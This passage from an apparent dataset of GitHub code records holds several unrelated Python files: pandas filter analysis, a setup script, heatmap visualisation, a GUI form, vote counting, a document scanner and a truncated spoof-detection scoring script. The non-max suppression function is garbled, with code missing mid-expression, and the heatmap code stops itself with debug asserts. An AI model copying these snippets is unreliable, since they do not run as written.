= input_df\n self.resulting_df = resulting_df\n self.merging_cols = merging_cols\n super(SingleColumnFilters, self).__init__()\n self.usage_percentage = dict()\n self.combo_cols = dict()\n self.combos_to_check_in_final = list()\n self.combos_to_exclude = pd.DataFrame()\n\n def get_multi_column_filters(self):\n logging.info(\"Starting Multi Column Filter Analisis\")\n self.find_matching_cols()\n if not self.matching_cols:\n logging.warning('Without shared columns this tool is worthless, consider renaming columns')\n return\n self._merge_input_to_final()\n self._set_final_df_to_work_with()\n self.columns_usage_percentage()\n self._determine_possible_multi_column_filters()\n self._determine_multi_column_filters()\n\n def _combo_appears_often_in_input(self, combo, input_catego_groupby):\n \"\"\"Given a combination of values for the columns in 'combo_cols' this function weights the amount\n of appearences in relation to the 'input_df' to determine if a filter excluding this combination is valuable.\n\n :param row: (DataFrame) single row df\n :param input_catego_df: (DataFrame): a DataFrame grouped by columns in 'combo_cols'\n :return: Boolean\n \"\"\"\n df = self.input_df.loc[input_catego_groupby.groups[combo]]\n multi_col_filter_ratio = len(df) / len(self.input_df)\n if multi_col_filter_ratio > MULTI_COL_FILTER_RATIO:\n return 
1\n else:\n return 0\n\n def _determine_possible_multi_column_filters(self):\n \"\"\"For the values / columns combinations generated using 'generate_possible_combinations', check if the\n combination exists in the 'input_df'.\n\n \"\"\"\n combinations_generator = self._generate_possible_combinations()\n input_catego_groupby = self.input_df.groupby(self.combo_cols)\n for combo in combinations_generator:\n if combo in input_catego_groupby.groups:\n if self._combo_appears_often_in_input(combo, input_catego_groupby):\n combo_row_df = pd.DataFrame([combo], columns=self.combo_cols)\n self.combos_to_check_in_final.append(combo_row_df)\n\n def _generate_possible_combinations(self):\n \"\"\"For the columns in the 'combo_cols' list calculate all possible combinations of the columns unique values\n\n \"\"\"\n lists_for_prod = list()\n self._set_combo_columns()\n for col in self.combo_cols:\n unique_values = list(self.input_df[col].unique())\n lists_for_prod.append(unique_values)\n return itertools.product(*lists_for_prod)\n\n def _determine_multi_column_filters(self):\n \"\"\"For the values / columns combinations already generated and found in 'input_df' check that is exists in\n the 'final_df' and that it appears often, if so it is added to a DF for post in the report.\n\n \"\"\"\n resulting_catego_df = self.final_df[self.combo_cols].drop_duplicates()\n combos_to_exclude = list()\n for combo_row in self.combos_to_check_in_final:\n if isin_row(combo_row, resulting_catego_df):\n combos_to_exclude.append(combo_row)\n self.combos_to_exclude = pd.concat(combos_to_exclude)\n\n def _set_combo_columns(self):\n \"\"\"If the number of combinations is larger than 'MULTIPLE_COMBINATION_FILTERS' in take out the column with the\n must unique values and calculate the number of combinations again, until the number is bellow the threshold.\n\n :return:\n \"\"\"\n for col in self.input_df.columns:\n if self._is_natural_divider(self.input_df[col]):\n self.combo_cols.update({col: len(self.input_df[col].unique())})\n number_of_combinations = reduce(lambda x, y: x * y, self.combo_cols.values())\n while number_of_combinations > MULTIPLE_COMBINATION_FILTERS:\n max_key = max(self.combo_cols.items(), key=operator.itemgetter(1))[0]\n del self.combo_cols[max_key]\n number_of_combinations = reduce(lambda x, y: x * y, self.combo_cols.values())\n self.combo_cols = list(self.combo_cols.keys())\n","repo_name":"carlosjpc/Pandas-Report-Tracer","sub_path":"pandas_report_tracer/utils/columns_to_work_with.py","file_name":"columns_to_work_with.py","file_ext":"py","file_size_in_byte":21067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"39591741458","text":"from setuptools import setup, find_packages\n\ntry:\n from numpy.distutils.core import setup\nexcept:\n from distutils.core import setup\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration\n config = Configuration(None, parent_package, top_path)\n config.set_options(ignore_setup_xxx_py=True,\n assume_default_configuration=True,\n delegate_options_to_subpackages=True,\n quiet=True)\n\n config.add_subpackage('msgr')\n config.add_subpackage('msgr.core')\n config.add_subpackage('msgr.core.instruments')\n config.add_subpackage('msgr.core.io')\n\n return config\n\nsetup(\n name='msgr',\n version='0.5',\n description='Matching Satellite and Ground Radar',\n 
long_description=readme,\n author='Valentin Louf',\n author_email='valentin.louf@bom.gov.au',\n url='https://gitlab.bom.gov.au/vlouf/Matchproj-python',\n license=license,\n packages=find_packages(exclude=('config', 'docs')),\n configuration=configuration,\n scripts=['scripts/matchvol', 'scripts/generate_config_matchvol']\n)\n","repo_name":"vlouf/matchproj","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"56"} +{"seq_id":"14147698646","text":"import os\nimport cv2\nimport math\nimport torch\nimport numpy as np\nfrom pyheatmap.heatmap import HeatMap\n\n\ndef vis_salient_patch(b_pos_sim, b_sim_12, b_imgs, labels, id2clss, iteration, epoch, save_dir):\n \"\"\"\n pos_sim: b, p_num\n imgs: b, 2, T, C, H, W\n labels: b\n \"\"\"\n batchsize = labels.shape[0]\n for b in range(batchsize):\n clss = id2clss[labels[b].item()]\n imgs = b_imgs[b]\n sim_11 = b_pos_sim[b].reshape(8, -1) # p_num = T, 49+16+4\n sim_12 = b_sim_12[b].reshape(8, -1)\n\n # sim_12 -> img2\n # sim_11 -> img1\n imgs1 = imgs[0] # 3, 224, 224 \n imgs2 = imgs[1]\n\n img1 = heatmap(imgs1, sim_11)\n img2 = heatmap(imgs2, sim_12)\n\n H, W, C = img1.shape\n img = np.zeros([H*2, W, C])\n img[:H, :, :] = img1\n img[H:, :, :] = img2\n \n img_name = '%d_%d_%d_%s.jpg'%(epoch, iteration, b, clss)\n if not os.path.exists('data/vis/%s'%save_dir):\n os.makedirs('data/vis/%s'%save_dir)\n cv2.imwrite('data/vis/%s/%s'%(save_dir, img_name), img)\n assert 1==0\n\ndef heatmap(imgs, sims):\n \"\"\"\n img: T, 3, H, W\n sim: T, 49+16+4\n \"\"\"\n print(imgs[0])\n print(sims[0])\n assert 1==0\n scale = [1, 2, 4]\n stride = [1, 2, 4]\n T = imgs.shape[0]\n htmaps = []\n for t in range(T):\n img = imgs[t] # C, H, W\n _, H, W = img.shape\n assert H==W\n sim = sims[t] # 49+16+4\n weights = []\n total_num = 0\n\n for i in range(3): # 3 scales\n num = math.ceil(7/stride[i])**2\n _sim = sim[total_num:total_num+num]\n total_num += num\n\n sim_len = math.ceil(H/7)*scale[i]\n _weights = torch.zeros([H, W])\n start_h = 0\n for k in range(num):\n start_w = 0\n for j in range(num): \n _weights[start_h:min(H, start_h+sim_len), start_w:min(W, start_w+sim_len)]\n start_w += min(W, int(sim_len/stride[i]))\n start_h += min(H, int(sim_len/stride[i]))\n \n\n weights.append(_weights)\n\n weights = torch.stack(weights) # 3, H, W\n weights, _ = torch.max(weights, dim=0) # H, W\n weights = weights.cpu().numpy()\n\n htmap = draw_heatmap(weights)\n htmaps.append(htmap)\n \n # concat all images and heatmap into a big image\n img = concat_htmaps(imgs, htmaps)\n\n return img\n\n\ndef draw_heatmap(weights):\n \"\"\"\n weights: H x W\n \"\"\"\n pmin = np.min(weights)\n pmax = np.max(weights)\n weights = ((weights - pmin) / (pmax - pmin + 0.000001))*255 \n weights = weights.astype(np.uint8)\n weights = cv2.applyColorMap(weights, cv2.COLORMAP_JET)\n return weights\n\n\ndef concat_htmaps(imgs, htmaps):\n \"\"\"\n imgs: T, 3, H, W\n htmaps: T, H, W\n \"\"\"\n T, C, H, W = imgs.shape\n imgs = imgs.permute(0, 2, 3, 1)\n imgs = imgs.numpy()\n img = np.zeros([H*2, W*T, C])\n\n for i in range(T):\n img[:H, W*i:W*(i+1), :] = imgs[i]\n img[H:, W*i:W*(i+1), :] = htmaps[i]\n\n return img\n\n\n#def transform_invert(img, transform_train):\n# \"\"\"\n# \n# 
\"\"\"","repo_name":"zhengsipeng/HCL-FSAR","sub_path":"utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"34452023081","text":"import nscmd\n\nclass FooInterpreter(nscmd.SubInterpreter):\n name = 'foo'\n\n def do_helloworld(self, args):\n \"\"\"prints Hello, foo!\"\"\"\n return \"Hello, foo!\"\n\nif __name__ == \"__main__\":\n\n # JIT imports allow for multi-file interpreters\n from bar import BarInterpreter\n\n # run commands from a list...\n cmds = [\"main foo\",\"helloworld\",\"main foo bar helloworld\"]\n m = nscmd.MainInterpreter(cmd_in=cmds)\n m.run()\n # ... and get the results in a list!\n print(nscmd.outqueue)\n\n # ... or use files for input and output\n m = nscmd.MainInterpreter(\n cmd_in=\"example_cmds.txt\",\n outfile=\"example_output.txt\"\n )\n m.run()\n\n # Use a string!\n cmdstr = \"main foo\\nhelloworld\\nmain foo bar helloworld\\n\"\n m = nscmd.MainInterpreter(\n cmd_in=cmdstr\n )\n m.run()\n print(nscmd.outqueue)\n\n # or run as a standard TUI\n m = nscmd.MainInterpreter()\n m.tui()\n\n # no matter what method you use, you can still access\n # the output as a list. It resets on each instantiation.\n print(nscmd.outqueue)\n","repo_name":"ropbear/nscmd","sub_path":"example/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41092624270","text":"import PySimpleGUI as sg\nfrom requests import post\nfrom urls import urls\n\n\nclass WinOne():\n '''Конструктор Class'''\n def __init__(self, status):\n self.status = status\n\n '''Переменные класса'''\n kod = ['find']\n kod1 = ['update']\n keys = ['nameAlloy', 'discript', 'tu_Gost']\n keysForServer = ['kod', 'nameAlloy']\n lenRasdelLine = 50 # Кол-во символов\n\n '''Основная функция класса'''\n def openwin(self, wind):\n\n if self.status == 'add':\n '''Цвет темы'''\n sg.theme('LightPurple')\n '''Запуск основногоо окна'''\n window = sg.Window('Первое окно', self.layout())\n self.controlAdd(window, wind)\n\n if self.status == 'read':\n #print('Второе окно')\n '''Цвет темы'''\n sg.theme('LightPurple')\n '''Запуск основногоо окна'''\n window = sg.Window('Первое окно', self.layoutTwo())\n self.controlAdd(window, wind)\n\n '''Функция закрытия текущего окна и открытия главного'''\n def colseWin(self, wind,window):\n window.close()\n wind.UnHide()\n #print('Работает Закрытие Первого окна')\n\n '''Функция Очистки полей'''\n def cleanFild(self, window):\n for key in self.keys:\n window[key].update('')\n\n '''Функция проверяет заполнение всех полей и ставит название марки в заглавный вид'''\n def dataUp(self, window, values):\n flag = 1\n for key in self.keys:\n if values[key] == '':\n window['-info-'].update('Заполните все поля!!!', text_color='red')\n flag = 0\n\n if flag == 1:\n textUp = values[self.keys[0]]\n textUp = textUp.upper()\n values.update({self.keys[0]: textUp})\n #print(values)\n return values\n\n '''Функция записывает данные в БД'''\n def sendData(self, url, data, window):\n try:\n r = post(url, data)\n message = r.json()\n resMessage = message['numRecord']\n if resMessage != '':\n if resMessage == 'Есть такой элемент':\n window['-info-'].update('Есть такой элемент', text_color='red')\n else:\n window['-info-'].update('Запись успешно занесена в БД', text_color='green')\n self.cleanFild(window)\n return resMessage\n except:\n window['-info-'].update('Нет 
соединения с БД')\n\n\n def layout(self):\n layout = [[sg.Text('Наименование Марки')],\n [sg.InputText(key=self.keys[0], size=(50, 1))],\n [sg.Text('Описание Марки')],\n [sg.InputText(key=self.keys[1], size=(50, 50))],\n [sg.Text('Гост или ТУ')],\n [sg.InputText(key=self.keys[2], size=(50, 1))],\n [sg.Text('_' * self.lenRasdelLine)],\n [sg.Text('', key='-info-', text_color='red', size=(50, 1))],\n [sg.Button('Добавить запись', key='-add-'), sg.Button('Очистить поля', key='-clean-'),\n sg.Button('Выход', key='-exit-')]\n ]\n return layout\n\n\n\n\n\n\n '''Функция управления окном в статусе Add'''\n\n def controlAdd(self, window, wind):\n while True:\n event, values = window.Read()\n if event in (None, '-exit-'):\n if wind != 'test':\n self.colseWin(wind, window)\n break\n\n ''' Очисщаем поля'''\n if event == '-clean-':\n self.cleanFild(window)\n #print('Очистка Полей')\n\n ''' Добавляем запись'''\n if event == '-add-':\n values['kod'] = 'add'\n #print(values)\n newData = self.dataUp(window, values)\n # print(newData)\n if newData != None:\n self.sendData(urls['alloy_input'], newData, window)\n\n ''' Корекция записи'''\n if event == '-up-':\n res = self.korect(values)\n if res=='ok update':\n window['-info-'].update('Корекция прошла успешно ', text_color='green')\n elif res == 'Нет соединения с сервером!':\n window['-info-'].update(res, text_color='red')\n elif res == 'Заполните все поля !':\n window['-info-'].update(res, text_color='red')\n else:\n window['-info-'].update('Корекция не прошла !', text_color='red')\n\n\n","repo_name":"MikeNordMan/Alloys_block","sub_path":"windowOne.py","file_name":"windowOne.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74395066415","text":"import sys\n\n# Add the parent folder path to the sys.path list\nsys.path.append('../')\n\n# Now you can import your module\n# pylint: disable=import-error\nimport common\n\ncommon.echo(\"start\")\n\nwith open(\"input\\\\test.txt\") as file:\n line = file.readline()\n count = 1\n while line:\n print(\"Line {}: {}\".format(count, line.strip()))\n value = int(line.strip())\n line = file.readline()\n count += 1\n\ncommon.echo(\"end\")\n","repo_name":"cfpaperdragon/advent-of-code-2020","sub_path":"Day01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"33934305751","text":"import numpy as np\n\ndef nms(bboxes, score_threshold, iou_threshold, sigma=0.3, method='nms'):\n classes = {}\n for bbox in bboxes:\n if bbox[4]x2 or y3>y2:\n return 0\n else:\n i = (y2-y3)*(x3-x2)\n u = (y2-y1)*(x2-x1) + (y4-y3)*(x4-x3) - i\n return i/u","repo_name":"bhushanap/CPquestions","sub_path":"NonMaxSupression/NMS.py","file_name":"NMS.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"27531417045","text":"#import Dependencies\nimport os\nimport csv\n\n#Open file path\ncsvpath = os.path.join( 'Resources','election_data.csv')\n\n#defining variables\ntotal_vote_counter = 0\n\ncandidates = []\n\nkhan_counter = 0\ncorrey_counter = 0\nli_counter = 0\notooley_counter = 0\n\ncandidates_percentages = []\n\n#open the csv\nwith open(csvpath, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter = ',')\n\n #set header row\n csvheader = next(csvfile)\n\n #start loop\n for row in csvreader:\n #Total Votes\n if 
row[0] != \" \":\n total_vote_counter = total_vote_counter + 1\n #List of unique candidates\n if row[2] not in candidates:\n candidates.append(row[2])\n #Votes for each candidate\n if row[2] == \"Khan\":\n khan_counter = khan_counter + 1\n if row[2] == \"Correy\":\n correy_counter = correy_counter + 1\n if row[2] == \"Li\":\n li_counter = li_counter + 1\n if row[2] == \"O'Tooley\":\n otooley_counter = otooley_counter + 1\n \n #calculate after loop, calculate percent, add value to empty list\n khan_percent = round(((khan_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(khan_percent)\n \n correy_percent = round(((correy_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(correy_percent)\n \n li_percent = round(((li_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(li_percent)\n \n otooley_percent = round(((otooley_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(otooley_percent)\n\n #Identify max value (max percent) to identify the winner\n percent_max = max(candidates_percentages)\n #Identify the max value index\n percent_max_index = candidates_percentages.index(percent_max)\n #Identify winning candidate by finding matching candidate to index\n winner = candidates[percent_max_index]\n\nprint(\"Election Results\")\nprint(\"-------------------------------\")\nprint(\"Total Votes: \" + str(total_vote_counter))\nprint(\"-------------------------------\")\nprint(str(candidates[0]) + \": \" + str(khan_percent) + \"% \" + \"(\" + str(khan_counter) + \")\")\nprint(str(candidates[1]) + \": \" + str(correy_percent) + \"% \" + \"(\" + str(correy_counter) + \")\")\nprint(str(candidates[2]) + \": \" + str(li_percent) + \"% \" + \"(\" + str(li_counter) + \")\")\nprint(str(candidates[3]) + \": \" + str(otooley_percent) + \"% \" + \"(\" + str(otooley_counter) + \")\")\nprint(\"-------------------------------\")\nprint(\"Winner: \" + str(winner))\nprint(\"-------------------------------\")\n\n#Print out Text File\n#Specify the file to write to\ntxt_results = os.path.join (\"analysis\", \"PyPollResults.txt\")\n\n#Open and write file\nwith open(txt_results, \"w\") as text_file:\n text_file.write(\"Election Results \\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(\"Total Votes: \" + str(total_vote_counter) + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(str(candidates[0]) + \": \" + str(khan_percent) + \"% \" + \"(\" + str(khan_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[1]) + \": \" + str(correy_percent) + \"% \" + \"(\" + str(correy_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[2]) + \": \" + str(li_percent) + \"% \" + \"(\" + str(li_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[3]) + \": \" + str(otooley_percent) + \"% \" + \"(\" + str(otooley_counter) + \")\" + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(\"Winner: \" + str(winner) + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n","repo_name":"josh-acampado/python_challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"44864779055","text":"import cv2\r\nimport numpy as np\r\n\r\ndef order_points(pts):\r\n # Order the points in the top-left, top-right, bottom-right, and bottom-left order\r\n rect = np.zeros((4, 2), 
dtype=\"float32\")\r\n s = np.sum(pts, axis=1)\r\n\r\n rect[0] = pts[np.argmin(s)]\r\n rect[2] = pts[np.argmax(s)]\r\n\r\n diff = np.diff(pts, axis=1)\r\n rect[1] = pts[np.argmin(diff)]\r\n rect[3] = pts[np.argmax(diff)]\r\n\r\n return rect\r\n\r\ndef four_point_transform(image, pts):\r\n rect = order_points(pts)\r\n (tl, tr, br, bl) = rect\r\n\r\n # Calculate the width of the new image\r\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\r\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\r\n maxWidth = max(int(widthA), int(widthB))\r\n\r\n # Calculate the height of the new image\r\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\r\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\r\n maxHeight = max(int(heightA), int(heightB))\r\n\r\n # Set the destination points for the perspective transform\r\n dst = np.array([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], dtype=\"float32\")\r\n\r\n # Compute the perspective transform matrix and apply it\r\n M = cv2.getPerspectiveTransform(rect, dst)\r\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\r\n\r\n return warped\r\n\r\n# Load the image\r\nimage = cv2.imread('input_image.jpg')\r\n\r\n# Resize the image for better display\r\nimage = cv2.resize(image, (800, 800))\r\n\r\n# Convert the image to grayscale\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n# Apply Gaussian blur to reduce noise\r\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\n# Perform Canny edge detection\r\nedges = cv2.Canny(blurred, 50, 150)\r\n\r\n# Find contours in the edge map\r\ncontours, _ = cv2.findContours(edges.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n# Sort the contours by area in descending order\r\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)\r\n\r\n# Iterate through the contours and find the document contour\r\nfor contour in contours:\r\n # Approximate the contour with a polygon\r\n perimeter = cv2.arcLength(contour, True)\r\n approx = cv2.approxPolyDP(contour, 0.02 * perimeter, True)\r\n\r\n # If the approximated polygon has four points, assume it is the document contour\r\n if len(approx) == 4:\r\n document_contour = approx\r\n break\r\n\r\n# Perform perspective transform to obtain the scanned image\r\nscanned_image = four_point_transform(image, document_contour.reshape(4, 2))\r\n\r\n# Display the original and scanned images\r\ncv2.imshow(\"Original Image\", image)\r\ncv2.imshow(\"Scanned Image\", scanned_image)\r\n\r\n# Save the scanned image\r\ncv2.imwrite(\"scanned_image.jpg\", scanned_image)\r\n\r\n# Wait for key press and then close the windows\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"zi524/task-cv","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"27307762372","text":"import argparse\nimport numpy as np\nimport glob\nimport torch\nimport torch.nn.functional as F\nimport os\nfrom kaldi_io import read_mat_scp\nimport model as model_\nimport scipy.io as sio\n\nfrom utils import *\n\ndef prep_feats(data_):\n\n\t#data_ = ( data_ - data_.mean(0) ) / data_.std(0)\n\n\tfeatures = data_.T\n\n\tif features.shape[1]<50:\n\t\tmul = int(np.ceil(50/features.shape[1]))\n\t\tfeatures = np.tile(features, (1, mul))\n\t\tfeatures = features[:, :50]\n\n\treturn torch.from_numpy(features[np.newaxis, np.newaxis, :, :]).float()\n\nif __name__ == 
'__main__':\n\n\tparser = argparse.ArgumentParser(description='Compute scores')\n\tparser.add_argument('--path-to-data-la', type=str, default='./data_la/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--path-to-data-pa', type=str, default='./data_pa/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--path-to-data-mix', type=str, default='./data_mix/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--model-la', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'TDNN_LSTM', 'FTDNN', 'mobilenet', 'densenet', 'VGG'], default='lcnn_29_CC', help='Model arch')\n\tparser.add_argument('--model-pa', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'TDNN_LSTM', 'FTDNN', 'mobilenet', 'densenet', 'VGG'], default='lcnn_9_prodspec', help='Model arch')\n\tparser.add_argument('--model-mix', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'FTDNN', 'TDNN_LSTM', 'mobilenet', 'densenet', 'VGG'], default='lcnn_29_CC', help='Model arch')\n\tparser.add_argument('--vgg-type-la', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--vgg-type-pa', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--vgg-type-mix', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--resnet-type-la', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--resnet-type-pa', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--resnet-type-mix', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--train-mode', choices=['mix', 'lapa', 'independent'], default='mix', help='Train mode')\n\tparser.add_argument('--trials-path', type=str, default=None, metavar='Path', help='Path to trials file')\n\tparser.add_argument('--cp-path', type=str, default=None, metavar='Path', help='Path for file containing model')\n\tparser.add_argument('--out-path', type=str, default='./', metavar='Path', help='Path to output hdf file')\n\tparser.add_argument('--prefix', type=str, default='./scores', metavar='Path', help='prefix for score files names')\n\tparser.add_argument('--no-cuda', action='store_true', default=False, help='Disables GPU use')\n\tparser.add_argument('--no-output-file', action='store_true', default=False, help='Disables writing scores into out file')\n\tparser.add_argument('--no-eer', action='store_true', default=False, help='Disables computation of EER')\n\tparser.add_argument('--eval', action='store_true', default=False, help='Enables eval trials reading')\n\tparser.add_argument('--ncoef-la', type=int, default=90, metavar='N', help='Number of cepstral coefs 
for the CC case (default: 90)')\n\tparser.add_argument('--ncoef-pa', type=int, default=90, metavar='N', help='Number of cepstral coefs for the CC case (default: 90)')\n\tparser.add_argument('--ncoef-mix', type=int, default=90, metavar='N', help='Number of cepstral coefs for the CC case (default: 90)')\n\targs = parser.parse_args()\n\targs.cuda = True if not args.no_cuda and torch.cuda.is_available() else False\n\n\tprint(args)\n\n\tif args.cp_path is None:\n\t\traise ValueError('There is no checkpoint/model path. Use arg --cp-path to indicate the path!')\n\n\tif os.path.isfile(args.out_path):\n\t\tos.remove(args.out_path)\n\t\tprint(args.out_path + ' Removed')\n\n\tif args.cuda:\n\t\tdevice = get_freer_gpu()\n\n\tif args.model_la == 'lstm':\n\t\tmodel_la = model_.cnn_lstm()\n\telif args.model_la == 'VGG':\n\t\tmodel_la = model_.VGG(vgg_name=args.vgg_type_la)\n\telif args.model_la == 'resnet':\n\t\tmodel_la = model_.ResNet(resnet_type=args.resnet_type_la)\n\telif args.model_la == 'resnet_pca':\n\t\tmodel_la = model_.ResNet_pca(resnet_type=args.resnet_type_la)\n\telif args.model_la == 'wideresnet':\n\t\tmodel_la = model_.WideResNet()\n\telif args.model_la == 'lcnn_9':\n\t\tmodel_la = model_.lcnn_9layers()\n\telif args.model_la == 'lcnn_29':\n\t\tmodel_la = model_.lcnn_29layers_v2()\n\telif args.model_la == 'lcnn_9_pca':\n\t\tmodel_la = model_.lcnn_9layers_pca()\n\telif args.model_la == 'lcnn_29_pca':\n\t\tmodel_la = model_.lcnn_29layers_v2_pca()\n\telif args.model_la == 'lcnn_9_icqspec':\n\t\tmodel_la = model_.lcnn_9layers_icqspec()\n\telif args.model_la == 'lcnn_9_prodspec':\n\t\tmodel_la = model_.lcnn_9layers_prodspec()\n\telif args.model_la == 'lcnn_9_CC':\n\t\tmodel_la = model_.lcnn_9layers_CC(ncoef=args.ncoef_la)\n\telif args.model_la == 'lcnn_29_CC':\n\t\tmodel_la = model_.lcnn_29layers_CC(ncoef=args.ncoef_la)\n\telif args.model_la == 'resnet_CC':\n\t\tmodel_la = model_.ResNet_CC(ncoef=args.ncoef_la, resnet_type=args.resnet_type_la)\n\telif args.model_la == 'TDNN':\n\t\tmodel_la = model_.TDNN(ncoef=args.ncoef_la)\n\telif args.model_la == 'TDNN_multipool':\n\t\tmodel_la = model_.TDNN_multipool(ncoef=args.ncoef_la)\n\telif args.model_la == 'TDNN_LSTM':\n\t\tmodel_la = model_.TDNN_LSTM(ncoef=args.ncoef_la)\n\telif args.model_la == 'FTDNN':\n\t\tmodel_la = model_.FTDNN(ncoef=args.ncoef_la)\n\telif args.model_la == 'Linear':\n\t\tmodel_la = model_.Linear(ncoef=args.ncoef_la)\n\telif args.model_la == 'mobilenet':\n\t\tmodel_la = model_.MobileNetV3_Small()\n\telif args.model_la == 'densenet':\n\t\tmodel_la = model_.DenseNet()\n\n\tif args.model_pa == 'lstm':\n\t\tmodel_pa = model_.cnn_lstm()\n\telif args.model_pa == 'VGG':\n\t\tmodel_pa = model_.VGG(vgg_name=args.vgg_type_pa)\n\telif args.model_pa == 'resnet':\n\t\tmodel_pa = model_.ResNet(resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'resnet_pca':\n\t\tmodel_pa = model_.ResNet_pca(resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'wideresnet':\n\t\tmodel_pa = model_.WideResNet()\n\telif args.model_pa == 'lcnn_9':\n\t\tmodel_pa = model_.lcnn_9layers()\n\telif args.model_pa == 'lcnn_29':\n\t\tmodel_pa = model_.lcnn_29layers_v2()\n\telif args.model_pa == 'lcnn_9_pca':\n\t\tmodel_pa = model_.lcnn_9layers_pca()\n\telif args.model_pa == 'lcnn_29_pca':\n\t\tmodel_pa = model_.lcnn_29layers_v2_pca()\n\telif args.model_pa == 'lcnn_9_icqspec':\n\t\tmodel_pa = model_.lcnn_9layers_icqspec()\n\telif args.model_pa == 'lcnn_9_prodspec':\n\t\tmodel_pa = model_.lcnn_9layers_prodspec()\n\telif args.model_pa == 'lcnn_9_CC':\n\t\tmodel_pa = 
